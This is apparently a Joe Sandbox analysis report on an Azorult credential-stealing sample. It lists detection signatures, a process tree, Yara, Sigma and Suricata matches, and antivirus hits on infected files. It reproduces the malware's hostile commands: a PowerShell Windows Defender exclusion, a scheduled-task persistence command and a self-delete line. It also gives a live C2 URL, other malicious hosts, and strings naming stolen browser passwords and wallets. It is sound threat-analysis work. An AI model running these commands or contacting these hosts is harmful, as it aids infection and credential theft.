Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MUH030425.exe

Overview

General Information

Sample name:MUH030425.exe
Analysis ID:1628929
MD5:7958c012f2efc42cc7ff436d3377abcc
SHA1:d854a2cb11b56d64dd7f87ee91ea47f305ce82bf
SHA256:b5c538f89ca2e3d9a8085bc387d85f7f50e9470975ffec25fe040c26226beccb
Tags:AZORultexeuser-abuse_ch
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Azorult
Yara detected Azorult Info Stealer
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MUH030425.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\MUH030425.exe" MD5: 7958C012F2EFC42CC7FF436D3377ABCC)
    • powershell.exe (PID: 6436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7604 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 764 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 8116 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8176 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 748 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • armsvc.exe (PID: 2752 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 3D877723521E447854F2D14A399DF609)
  • alg.exe (PID: 2788 cmdline: C:\Windows\System32\alg.exe MD5: 61760BE49CD9708D843449EAD1D669A3)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 4324 cmdline: C:\Windows\system32\AppVClient.exe MD5: BF39D0936217E1A59C83468A6716E70E)
  • wBBaygjR.exe (PID: 4108 cmdline: C:\Users\user\AppData\Roaming\wBBaygjR.exe MD5: 7958C012F2EFC42CC7FF436D3377ABCC)
  • FXSSVC.exe (PID: 4944 cmdline: C:\Windows\system32\fxssvc.exe MD5: 86BDE7868C6C41A00C97E73C1CD72B93)
  • elevation_service.exe (PID: 1072 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 67BB480DD6819EAD60CD2E73B029F950)
  • maintenanceservice.exe (PID: 2016 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 56DA935CD0FEE49A761CCBCA2668689D)
  • msdtc.exe (PID: 1876 cmdline: C:\Windows\System32\msdtc.exe MD5: 19DFE2392D1CF697BE730F1FF609BAD9)
  • PerceptionSimulationService.exe (PID: 4984 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: D65BAF460BDD6585F754EDC9F491A86A)
  • perfhost.exe (PID: 4324 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: B241E79D1D240C51DA8A9AC98E851CE2)
  • Locator.exe (PID: 7220 cmdline: C:\Windows\system32\locator.exe MD5: 21B5E199C73F3F7A731A5112250DCE39)
  • SensorDataService.exe (PID: 7272 cmdline: C:\Windows\System32\SensorDataService.exe MD5: BB8AEE9F1D920A95B225E78F061D5DDB)
  • snmptrap.exe (PID: 7324 cmdline: C:\Windows\System32\snmptrap.exe MD5: F780962D6375440FB2BCBEC6BD256F90)
  • Spectrum.exe (PID: 7356 cmdline: C:\Windows\system32\spectrum.exe MD5: 45373E5182419E96D4055979A8B2C87A)
  • ssh-agent.exe (PID: 7456 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 7310EF4C2A9585A6BDD6BD676EC7D705)
  • TieringEngineService.exe (PID: 7528 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: CC81E30E0B7BD855805ED98047EE9AB2)
  • AgentService.exe (PID: 7620 cmdline: C:\Windows\system32\AgentService.exe MD5: CC178E98936A3498548AC8CB29D26EF7)
  • vds.exe (PID: 7688 cmdline: C:\Windows\System32\vds.exe MD5: F92E9FF7433F8726D70F67D0B8FE8A69)
  • wbengine.exe (PID: 7824 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 41033F6D61728B9E9F4ED8045CDB4880)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://k1d5.icu/TP341/index.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x128918:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0x11bc40:$a2: %APPDATA%\.purple\accounts.xml
      • 0x11c388:$a3: %TEMP%\curbuf.dat
      • 0x12869c:$a4: PasswordsList.txt
      • 0x1236a0:$a5: Software\Valve\Steam
      00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
      • 0x126ae0:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x127140:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x128828:$v2: http://ip-api.com/json
      • 0x12749a:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
      00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        Click to see the 20 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.RegSvcs.exe.4f5999a.6.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          8.2.RegSvcs.exe.4f5999a.6.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
          • 0x299269:$string1: SELECT origin_url, username_value, password_value FROM logins
          • 0x29a19a:$string1: SELECT origin_url, username_value, password_value FROM logins
          • 0x109a34:$string2: API call with %s database connection pointer
          • 0x10a668:$string3: os_win.c:%d: (%lu) %s(%s) - %s
          8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
            8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
              8.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
              • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
              • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
              • 0xdec0:$a3: %TEMP%\curbuf.dat
              • 0x1a1d4:$a4: PasswordsList.txt
              • 0x151d8:$a5: Software\Valve\Steam
              Click to see the 12 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", ProcessId: 764, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", ProcessId: 764, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:47.362851+010020291371Malware Command and Control Activity Detected104.21.96.180192.168.2.949707TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:36:24.491907+010020516511A Network Trojan was detected192.168.2.9649071.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:52.672541+010020516491A Network Trojan was detected192.168.2.9650661.1.1.153UDP
              2025-03-04T09:34:54.647828+010020516491A Network Trojan was detected192.168.2.9509951.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:50.416039+010020516481A Network Trojan was detected192.168.2.9509421.1.1.153UDP
              2025-03-04T09:34:52.148655+010020516481A Network Trojan was detected192.168.2.9615051.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:47.944002+010020181411A Network Trojan was detected54.244.188.17780192.168.2.949710TCP
              2025-03-04T09:34:48.219952+010020181411A Network Trojan was detected18.141.10.10780192.168.2.949709TCP
              2025-03-04T09:34:50.416777+010020181411A Network Trojan was detected44.221.84.10580192.168.2.949713TCP
              2025-03-04T09:35:28.388771+010020181411A Network Trojan was detected47.129.31.21280192.168.2.949744TCP
              2025-03-04T09:35:36.378574+010020181411A Network Trojan was detected34.227.7.13880192.168.2.949754TCP
              2025-03-04T09:35:41.626939+010020181411A Network Trojan was detected35.164.78.20080192.168.2.949759TCP
              2025-03-04T09:35:42.285943+010020181411A Network Trojan was detected3.94.10.3480192.168.2.949760TCP
              2025-03-04T09:35:54.407982+010020181411A Network Trojan was detected18.246.231.12080192.168.2.949770TCP
              2025-03-04T09:35:57.030381+010020181411A Network Trojan was detected13.251.16.15080192.168.2.949772TCP
              2025-03-04T09:36:17.244513+010020181411A Network Trojan was detected34.246.200.16080192.168.2.949789TCP
              2025-03-04T09:36:24.491833+010020181411A Network Trojan was detected3.254.94.18580192.168.2.949797TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:47.944002+010020377711A Network Trojan was detected54.244.188.17780192.168.2.949710TCP
              2025-03-04T09:34:48.219952+010020377711A Network Trojan was detected18.141.10.10780192.168.2.949709TCP
              2025-03-04T09:34:50.416777+010020377711A Network Trojan was detected44.221.84.10580192.168.2.949713TCP
              2025-03-04T09:35:28.388771+010020377711A Network Trojan was detected47.129.31.21280192.168.2.949744TCP
              2025-03-04T09:35:36.378574+010020377711A Network Trojan was detected34.227.7.13880192.168.2.949754TCP
              2025-03-04T09:35:41.626939+010020377711A Network Trojan was detected35.164.78.20080192.168.2.949759TCP
              2025-03-04T09:35:42.285943+010020377711A Network Trojan was detected3.94.10.3480192.168.2.949760TCP
              2025-03-04T09:35:54.407982+010020377711A Network Trojan was detected18.246.231.12080192.168.2.949770TCP
              2025-03-04T09:35:57.030381+010020377711A Network Trojan was detected13.251.16.15080192.168.2.949772TCP
              2025-03-04T09:36:17.244513+010020377711A Network Trojan was detected34.246.200.16080192.168.2.949789TCP
              2025-03-04T09:36:24.491833+010020377711A Network Trojan was detected3.254.94.18580192.168.2.949797TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:47.102681+010020294671Malware Command and Control Activity Detected192.168.2.949707104.21.96.180TCP
              2025-03-04T09:34:56.050297+010020294671Malware Command and Control Activity Detected192.168.2.949722104.21.96.180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:47.102681+010028102761Malware Command and Control Activity Detected192.168.2.949707104.21.96.180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-04T09:34:48.183765+010028508511Malware Command and Control Activity Detected192.168.2.94970918.141.10.10780TCP
              2025-03-04T09:35:54.402772+010028508511Malware Command and Control Activity Detected192.168.2.94977018.246.231.12080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://13.251.16.150/lljqpleAvira URL Cloud: Label: malware
              Source: http://13.251.16.150/ksbpAvira URL Cloud: Label: malware
              Source: http://ww12.przvgke.biz/gedtsq?usid=18&utid=30152678479Avira URL Cloud: Label: malware
              Source: http://ww7.przvgke.biz/b?usid=18&utid=30152678348Avira URL Cloud: Label: malware
              Source: http://k1d5.icu/TP341/index.phpAvira URL Cloud: Label: malware
              Source: http://13.251.16.150/kgihcqktxxAvira URL Cloud: Label: malware
              Source: http://ww12.przvgke.biz/cygwkoswoy?usid=18&utid=30152678086Avira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Found malware configuration
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://k1d5.icu/TP341/index.php"}
              Multi AV Scanner detection for submitted file
              Source: MUH030425.exeVirustotal: Detection: 33%Perma Link
              Source: MUH030425.exeReversingLabs: Detection: 28%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004094C4 CryptUnprotectData,LocalFree,8_2_004094C4
              Source: MUH030425.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: MUH030425.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe1.13.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: plugin-container.pdb source: alg.exe, 0000000D.00000003.2202633741.0000000000650000.00000004.00001000.00020000.00000000.sdmp
